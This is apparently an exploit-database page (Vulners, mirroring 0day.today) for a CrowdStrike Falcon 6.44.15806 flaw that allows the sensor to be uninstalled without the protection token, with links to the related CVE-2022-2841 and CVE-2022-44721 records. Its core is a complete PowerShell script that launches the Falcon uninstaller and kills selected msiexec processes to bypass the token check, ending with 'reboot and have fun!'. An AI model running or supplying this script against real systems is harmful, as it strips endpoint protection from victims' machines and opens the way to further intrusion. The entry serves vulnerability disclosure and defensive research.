Lucene search
K

CrowdStrike Falcon AGENT 6.44.15806 - Uninstall without Installation Token Vulnerability

🗓️ 30 Mar 2023 00:00:00Reported by Fortunato LodariType 
zdt
 zdt
🔗 0day.today👁 654 Views

CrowdStrike Falcon AGENT 6.44.15806 Uninstall Vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for CVE-2022-44721
3 Dec 202211:04
githubexploit
ATTACKERKB
CVE-2022-44721
4 Dec 202205:15
attackerkb
BDU FSTEC
The vulnerability of the Uninstall Protection function of the Crowdstrike Falcon endpoint protection software allows a malicious actor to remove the CrowdStrike software.
23 Aug 202200:00
bdu_fstec
Circl
CVE-2022-2841
15 Apr 202513:54
circl
Circl
CVE-2022-44721
4 Dec 202207:38
circl
CNNVD
Falcon 安全漏洞
22 Aug 202200:00
cnnvd
CNNVD
编号撤回
4 Dec 202200:00
cnnvd
CVE
CVE-2022-2841
22 Aug 202208:05
cve
CVE
CVE-2022-44721
4 Dec 202204:17
cve
Cvelist
CVE-2022-2841 CrowdStrike Falcon Uninstallation authorization
22 Aug 202208:05
cvelist
Rows per page
# Exploit Title: CrowdStrike Falcon AGENT  6.44.15806  - Uninstall without Installation Token 
# Exploit Author: Walter Oberacher, Raffaele Nacca, Davide Bianchin, Fortunato Lodari, Luca Bernardi (Deda Cloud Cybersecurity Team) 
# Vendor Homepage: https://www.crowdstrike.com/ 
# Author Homepage: https://www.deda.cloud/ 
# Tested On: All Windows versions 
# Version: 6.44.15806 
# CVE: Based on CVE-2022-2841; Modified by Deda Cloud Purple Team members, to exploit hotfixed release. Pubblication of of CVE-2022-44721 in progress. 


$InstalledSoftware = Get-ChildItem "HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall"

foreach($obj in $InstalledSoftware){
    if ("CrowdStrike Sensor Platform" -eq $obj.GetValue('DisplayName'))
    {
        $uninstall_uuid = $obj.Name.Split("\")[6]
    }
}

$g_msiexec_instances = New-Object System.Collections.ArrayList

Write-Host "[+] Identified installed Falcon: $uninstall_uuid"
Write-Host "[+] Running uninstaller for Crowdstrike Falcon . . ."
Start-Process "msiexec" -ArgumentList "/X$uninstall_uuid"

while($true)
{
	if (get-process -Name "CSFalconService") {
		Get-Process | Where-Object { $_.Name -eq "msiexec" } | ForEach-Object {
			
			if (-Not $g_msiexec_instances.contains($_.id)){
				$g_msiexec_instances.Add($_.id)
				if (4 -eq $g_msiexec_instances.count -or 5 -eq $g_msiexec_instances.count){
					Start-Sleep -Milliseconds 100
					Write-Host "[+] Killing PID " + $g_msiexec_instances[-1]
					stop-process -Force -Id $g_msiexec_instances[-1]				
				}

			}
		
		}
	} else { 
		Write-Host "[+] CSFalconService process vanished...reboot and have fun!"
		break
	}
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

30 Mar 2023 00:00Current
3.6Low risk
Vulners AI Score3.6
CVSS 3.12.7
EPSS0.10375
654